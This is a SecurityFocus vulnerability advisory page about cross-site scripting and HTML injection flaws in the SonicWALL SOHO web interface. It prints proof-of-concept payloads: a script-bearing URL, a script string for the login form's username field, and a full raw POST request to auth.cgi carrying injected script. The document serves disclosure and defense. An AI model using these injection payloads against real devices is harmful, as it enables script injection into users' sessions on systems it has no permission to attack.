Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

SonicWALL SOHO Web Interface Multiple Remote Input Validation Vulnerabilities

No exploit is required to leverage either of these issues. The following proof of concepts have been made available:

To leverage the cross-site scripting issue:
http://www.example.com/<script>alert("Its not magic... its a sonic")</script>

To leverage the HTML injection issue enter the following into the 'username' field of the login form:

</TD><script>alert("!")</script>

It is also possible to leverage the HTML injection issue by submitting the following POST request:

POST http://192.168.168.168:80/auth.cgi HTTP/1.0
Accept: */*
Referer: http://192.168.168.168/auth.html
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: BadGuy
Host: 192.168.168.168
Content-Length: 160
Pragma: no-cache uName=</TD><script>alert("Its_not_magic..._its_a_sonic")</script>&pass=NiceTry&Submit=Login&clientHash=bbe63bb858b02e741d2d12023ee350a1







 

Privacy Statement
Copyright 2008, SecurityFocus